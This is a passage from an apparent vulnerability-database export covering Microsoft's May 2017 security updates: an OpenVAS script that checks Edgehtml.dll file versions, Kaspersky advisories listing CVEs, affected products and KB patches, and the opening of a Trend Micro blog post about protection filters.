9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:19:21", "description": "This host is missing a critical security\n update according to Microsoft Security update KB4016871.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4016871)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0229", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0248", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0233", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0235", "CVE-2017-0240", "CVE-2017-0269", "CVE-2017-0227", "CVE-2017-0259", "CVE-2017-0230", "CVE-2017-0224", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0266", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0236", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0212", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0241", "CVE-2017-0213", "CVE-2017-0234", "CVE-2017-0276", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811108", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811108", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4016871)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811108\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0212\", \"CVE-2017-0213\",\n \"CVE-2017-0214\", \"CVE-2017-0222\", \"CVE-2017-0224\", \"CVE-2017-0226\",\n \"CVE-2017-0227\", \"CVE-2017-0228\", \"CVE-2017-0229\", \"CVE-2017-0230\",\n \"CVE-2017-0231\", \"CVE-2017-0233\", \"CVE-2017-0234\", \"CVE-2017-0235\",\n \"CVE-2017-0236\", \"CVE-2017-0238\", \"CVE-2017-0240\", \"CVE-2017-0241\",\n \"CVE-2017-0246\", \"CVE-2017-0248\", \"CVE-2017-0258\", \"CVE-2017-0259\",\n \"CVE-2017-0263\", \"CVE-2017-0266\", \"CVE-2017-0267\", \"CVE-2017-0268\",\n \"CVE-2017-0269\", \"CVE-2017-0270\", \"CVE-2017-0271\", \"CVE-2017-0272\",\n \"CVE-2017-0273\", \"CVE-2017-0274\", \"CVE-2017-0275\", \"CVE-2017-0276\",\n \"CVE-2017-0277\", \"CVE-2017-0278\", \"CVE-2017-0279\", \"CVE-2017-0280\");\n script_bugtraq_id(98121, 98114, 98099, 98102, 98103, 98127, 98214, 98139, 98281,\n 98164, 98217, 98222, 98173, 98179, 98229, 98230, 98234, 98237,\n 98203, 98208, 98108, 98117, 98112, 98113, 98258, 98276, 98259,\n 98261, 98263, 98264, 98265, 98260, 98274, 98266, 98267, 98268,\n 98270, 98271, 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 08:52:53 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4016871)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Security update KB4016871.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This monthly rollup,\n\n - Addressed issue with Surface Hub devices waking from sleep approximately\n every four minutes after the first two hours.\n\n - Addressed issue where autochk.exe can randomly skip drive checks and not fix\n corruptions, which may lead to data loss.\n\n - Addressed an issue where Microsoft Edge users in networking environments that\n do not fully support the TCP Fast Open standard may have problems connecting\n to some websites. Users can re-enable TCP Fast Open in about:flags.\n\n - Addressed issues with Arc Touch mouse Bluetooth connectivity.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, execute\n arbitrary code in the context of the current user, gain the same user rights as\n the current user, could take control of an affected system, cause a host\n machine to crash, spoof content and bypass security restrictions.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4016871\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4016871\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.295\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.15063.0 - 11.0.15063.295\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2022-01-19T15:06:09", "description": "### *Detect date*:\n05/09/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, cause denial of service, bypass security restrictions, gain privileges.\n\n### *Affected products*:\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nInternet Explorer 9 \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2012 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nInternet Explorer 11 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2016 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows RT 8.1 \nWindows 10 Version 1703 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nMicrosoft Edge (EdgeHTML-based) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nInternet Explorer 10 \nWindows 10 Version 1703 for 32-bit Systems \nWindows Server 2012 R2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-0220](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0220>) \n[CVE-2017-0222](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0222>) \n[CVE-2017-0280](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0280>) \n[CVE-2017-0064](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0064>) \n[CVE-2017-0272](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0272>) \n[CVE-2017-0246](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0246>) \n[CVE-2017-0278](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0278>) \n[CVE-2017-0279](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0279>) \n[CVE-2017-0190](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0190>) \n[CVE-2017-0214](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0214>) \n[CVE-2017-0273](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0273>) \n[CVE-2017-0270](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0270>) \n[CVE-2017-0271](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0271>) \n[CVE-2017-0276](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0276>) \n[CVE-2017-0277](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0277>) \n[CVE-2017-0274](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0274>) \n[CVE-2017-0213](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0213>) \n[CVE-2017-0238](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0238>) \n[CVE-2017-0258](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0258>) \n[CVE-2017-0077](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0077>) \n[CVE-2017-0175](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0175>) \n[CVE-2017-0171](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0171>) \n[CVE-2017-0269](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0269>) \n[CVE-2017-0268](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0268>) \n[CVE-2017-0245](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0245>) \n[CVE-2017-0244](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0244>) \n[CVE-2017-0242](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0242>) \n[CVE-2017-0263](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0263>) \n[CVE-2017-0275](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0275>) \n[CVE-2017-0267](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0267>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-0238](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0238>)7.6Critical \n[CVE-2017-0222](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0222>)7.6Critical \n[CVE-2017-0064](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0064>)4.3Warning \n[CVE-2017-0280](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0280>)7.1High \n[CVE-2017-0279](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0279>)6.8High \n[CVE-2017-0278](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0278>)6.8High \n[CVE-2017-0277](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0277>)6.8High \n[CVE-2017-0276](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0276>)4.3Warning \n[CVE-2017-0275](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0275>)4.3Warning \n[CVE-2017-0274](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0274>)4.3Warning \n[CVE-2017-0273](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0273>)4.3Warning \n[CVE-2017-0272](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0272>)9.3Critical \n[CVE-2017-0271](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0271>)4.3Warning \n[CVE-2017-0270](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0270>)4.3Warning \n[CVE-2017-0269](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0269>)4.3Warning \n[CVE-2017-0268](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0268>)4.3Warning \n[CVE-2017-0267](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0267>)4.3Warning \n[CVE-2017-0263](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0263>)7.2High \n[CVE-2017-0258](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0258>)1.9Warning \n[CVE-2017-0246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0246>)6.9High \n[CVE-2017-0245](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0245>)1.9Warning \n[CVE-2017-0244](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0244>)6.9High \n[CVE-2017-0242](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0242>)4.3Warning \n[CVE-2017-0220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0220>)1.9Warning \n[CVE-2017-0214](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0214>)4.4Warning \n[CVE-2017-0213](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0213>)1.9Warning \n[CVE-2017-0190](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0190>)2.1Warning \n[CVE-2017-0175](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0175>)2.1Warning \n[CVE-2017-0171](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0171>)4.3Warning \n[CVE-2017-0077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0077>)7.2High\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4018271](<http://support.microsoft.com/kb/4018271>) \n[4019264](<http://support.microsoft.com/kb/4019264>) \n[4019263](<http://support.microsoft.com/kb/4019263>) \n[4019149](<http://support.microsoft.com/kb/4019149>) \n[4018885](<http://support.microsoft.com/kb/4018885>) \n[4019206](<http://support.microsoft.com/kb/4019206>) \n[4018821](<http://support.microsoft.com/kb/4018821>) \n[4018927](<http://support.microsoft.com/kb/4018927>) \n[4018556](<http://support.microsoft.com/kb/4018556>) \n[4019204](<http://support.microsoft.com/kb/4019204>) \n[4018466](<http://support.microsoft.com/kb/4018466>) \n[4018196](<http://support.microsoft.com/kb/4018196>)", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T00:00:00", "type": "kaspersky", "title": "KLA11077 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0175", "CVE-2017-0190", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0222", "CVE-2017-0238", "CVE-2017-0242", "CVE-2017-0244", "CVE-2017-0245", "CVE-2017-0246", "CVE-2017-0258", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-01-18T00:00:00", "id": "KLA11077", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11077/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-18T11:18:04", "description": "### *Detect date*:\n05/09/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to obtain sensitive information, cause denial of service, execute arbitrary code, gain privileges.\n\n### *Affected products*:\nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2012 \nWindows RT 8.1 \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2012 R2 \nWindows 10 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1703 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 8.1 for x64-based systems \nWindows Server 2016 (Server Core installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-0280](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0280>) \n[CVE-2017-0274](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0274>) \n[CVE-2017-0272](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0272>) \n[CVE-2017-0279](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0279>) \n[CVE-2017-0273](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0273>) \n[CVE-2017-0276](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0276>) \n[CVE-2017-0278](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0278>) \n[CVE-2017-0213](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0213>) \n[CVE-2017-0212](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0212>) \n[CVE-2017-0270](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0270>) \n[CVE-2017-0245](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0245>) \n[CVE-2017-0171](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0171>) \n[CVE-2017-0259](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0259>) \n[CVE-2017-0246](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0246>) \n[CVE-2017-0277](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0277>) \n[CVE-2017-0258](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0258>) \n[CVE-2017-0269](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0269>) \n[CVE-2017-0267](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0267>) \n[CVE-2017-0077](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0077>) \n[CVE-2017-0190](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0190>) \n[CVE-2017-0275](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0275>) \n[CVE-2017-0271](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0271>) \n[CVE-2017-0214](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0214>) \n[CVE-2017-0263](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0263>) \n[CVE-2017-0268](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0268>) \n[CVE-2017-0220](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0220>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Server 2012](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2012/>)\n\n### *CVE-IDS*:\n[CVE-2017-0280](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0280>)7.1High \n[CVE-2017-0279](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0279>)6.8High \n[CVE-2017-0278](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0278>)6.8High \n[CVE-2017-0277](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0277>)6.8High \n[CVE-2017-0276](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0276>)4.3Warning \n[CVE-2017-0275](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0275>)4.3Warning \n[CVE-2017-0274](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0274>)4.3Warning \n[CVE-2017-0273](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0273>)4.3Warning \n[CVE-2017-0272](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0272>)9.3Critical \n[CVE-2017-0271](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0271>)4.3Warning \n[CVE-2017-0270](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0270>)4.3Warning \n[CVE-2017-0269](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0269>)4.3Warning \n[CVE-2017-0268](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0268>)4.3Warning \n[CVE-2017-0267](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0267>)4.3Warning \n[CVE-2017-0263](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0263>)7.2High \n[CVE-2017-0259](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0259>)1.9Warning \n[CVE-2017-0258](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0258>)1.9Warning \n[CVE-2017-0246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0246>)6.9High \n[CVE-2017-0245](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0245>)1.9Warning \n[CVE-2017-0220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0220>)1.9Warning \n[CVE-2017-0214](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0214>)4.4Warning \n[CVE-2017-0213](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0213>)1.9Warning \n[CVE-2017-0212](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0212>)5.4High \n[CVE-2017-0190](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0190>)2.1Warning \n[CVE-2017-0171](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0171>)4.3Warning \n[CVE-2017-0077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0077>)7.2High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4038788](<http://support.microsoft.com/kb/4038788>) \n[4016871](<http://support.microsoft.com/kb/4016871>) \n[4019474](<http://support.microsoft.com/kb/4019474>) \n[4019215](<http://support.microsoft.com/kb/4019215>) \n[4019216](<http://support.microsoft.com/kb/4019216>) \n[4019473](<http://support.microsoft.com/kb/4019473>) \n[4019472](<http://support.microsoft.com/kb/4019472>) \n[4019213](<http://support.microsoft.com/kb/4019213>) \n[4019214](<http://support.microsoft.com/kb/4019214>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T00:00:00", "type": "kaspersky", "title": "KLA11009 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0245", "CVE-2017-0246", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2020-09-29T00:00:00", "id": "KLA11009", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11009/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2017-05-18T08:47:17", "description": "\n\nAlthough I\u2019m still dreaming of the sandy beaches of Cancun, it\u2019s time to get back to reality. Security vulnerabilities never take a holiday and this week is no exception. In addition to our normal Digital Vaccine (DV) package delivered earlier this week, we also issued an out-of-band DV package to address zero-day vulnerabilities for Intel Active Management Technology (AMT) ([CVE-2017-5689](<https://nvd.nist.gov/vuln/detail/CVE-2017-5689>)) and Windows Defender ([CVE-2017-0290](<https://nvd.nist.gov/vuln/detail/CVE-2017-0290>)).\n\nThe Intel AMT vulnerability is an escalation of privilege vulnerability that allows an unprivileged attacker to gain control of the manageability features provided by the affected Intel AMT products. The Windows Defender vulnerability is much scarier because allows a remote attacker to take over a system without any interaction from the system owner. Just the mere execution of Windows Defender scanning an email or instant message from an attacker is enough. But don\u2019t worry \u2013 customers using TippingPoint solutions are protected from these vulnerabilities with the following DV filters:\n\n| \n\n * 28214: HTTP: Null 